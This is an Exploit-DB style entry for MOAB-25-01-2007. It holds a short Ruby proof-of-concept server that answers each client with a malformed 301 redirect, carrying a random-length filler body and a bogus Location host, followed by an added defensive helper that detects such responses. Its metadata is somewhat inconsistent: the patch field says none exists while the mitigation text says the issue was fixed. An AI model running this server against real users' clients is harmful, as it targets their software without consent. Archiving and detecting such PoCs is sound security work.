by: Lance M. Havok
CVSS: 5.5 (MEDIUM)
CWE: HTTP Server Redirect
Patch Exists: NO
Platforms Tested:
2007

Proof of Concept for MOAB-25-01-2007

This script is a proof of concept for the MOAB-25-01-2007 vulnerability. It starts an HTTP server on the specified port (default 80) and waits for incoming connections. For each connection it picks a random content length (rand(80), so 0 to 79 bytes) and extracts the User-Agent header from the request, which it only prints to the console. It then answers with a 301 redirect (status line "HTTP/1.1 301 OK") whose Location header points to a non-existent URL, http://nonexistent123, sends a response body consisting of that many 'X' characters, and closes the connection. This vulnerability can be used for HTTP server redirection attacks.

Mitigation:

To mitigate this vulnerability, update the affected HTTP server software to the latest version; this vulnerability was reported and addressed in 2007.
Source

Exploit-DB raw data:

#!/usr/bin/ruby
# (c) Copyright 2007 Lance M. Havok <lmh [at] info-pull.com>
# Proof of concept for MOAB-25-01-2007.
#

require 'socket'

web_port = (ARGV[0] || 80).to_i

puts "++ Starting HTTP server at port #{web_port}."
web_server  = TCPServer.new(nil, web_port)
while (session = web_server.accept)
  rand_clen = rand(80)
  # Log the client's User-Agent; .to_s avoids a crash when the header is absent.
  useragent = session.recvfrom(2000)[0].scan(/User-Agent: (.*)/).flatten[0].to_s.chomp
  puts "++ Connected: #{useragent}"
  session.print "HTTP/1.1 301 OK\r\n"
  session.print "Content-Type: text/html\r\n"
  session.print "Content-Length: #{rand_clen}\r\n"
  session.print "Location: http://nonexistent123\r\n\r\n"
  session.print "X" * rand_clen
  session.close
end

# milw0rm.com [2007-01-25]
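
The following is an added example, not part of the original Exploit-DB entry: a triage helper that checks a captured raw HTTP response for the traits the script above produces (a 301 with the reason phrase "OK", a Location host with no dot, a body made of one repeated character). The function names, trait symbols and both sample responses are constructed for illustration; the checks are heuristics derived only from this script, and single-label intranet hosts can trigger the host check legitimately.

```ruby
require 'uri'

# Canonical reason phrases for the redirect codes this check covers.
REDIRECT_REASONS = { 301 => 'Moved Permanently', 302 => 'Found',
                     307 => 'Temporary Redirect' }.freeze

# Constructed samples: one shaped like the PoC's reply, one ordinary redirect.
SAMPLE_POC = "HTTP/1.1 301 OK\r\nContent-Type: text/html\r\n" \
             "Content-Length: 5\r\nLocation: http://nonexistent123\r\n\r\nXXXXX"
SAMPLE_BENIGN = "HTTP/1.1 301 Moved Permanently\r\n" \
                "Location: https://www.example.com/\r\nContent-Length: 0\r\n\r\n"

# Split a raw HTTP response into status code, reason phrase, headers and body.
def parse_response(raw)
  head, body = raw.to_s.split("\r\n\r\n", 2)
  lines = head.to_s.split("\r\n")
  m = %r{\AHTTP/\d\.\d (\d{3}) ?(.*)\z}.match(lines.shift.to_s)
  raise ArgumentError, 'malformed status line' unless m
  headers = lines.each_with_object({}) do |line, h|
    name, value = line.split(':', 2)
    h[name.strip.downcase] = value.to_s.strip
  end
  { code: m[1].to_i, reason: m[2], headers: headers, body: body.to_s }
end

# Return the PoC-like traits present in one response (empty for non-redirects).
def poc_traits(raw)
  r = parse_response(raw)
  return [] unless REDIRECT_REASONS.key?(r[:code])
  traits = []
  traits << :reason_mismatch unless r[:reason].casecmp?(REDIRECT_REASONS[r[:code]])
  uri = (URI.parse(r[:headers]['location'].to_s) rescue nil)
  traits << :unparseable_location if uri.nil?
  # Relative redirects have no host and are legitimate, so they are not flagged.
  traits << :single_label_host if uri&.host && !uri.host.include?('.')
  body = r[:body]
  traits << :filler_body if body.length > 1 && body.chars.uniq.length == 1
  traits
end

if __FILE__ == $PROGRAM_NAME
  { 'poc-like' => SAMPLE_POC, 'benign' => SAMPLE_BENIGN }.each do |label, raw|
    puts "#{label}: #{poc_traits(raw).inspect}"
  end
end
```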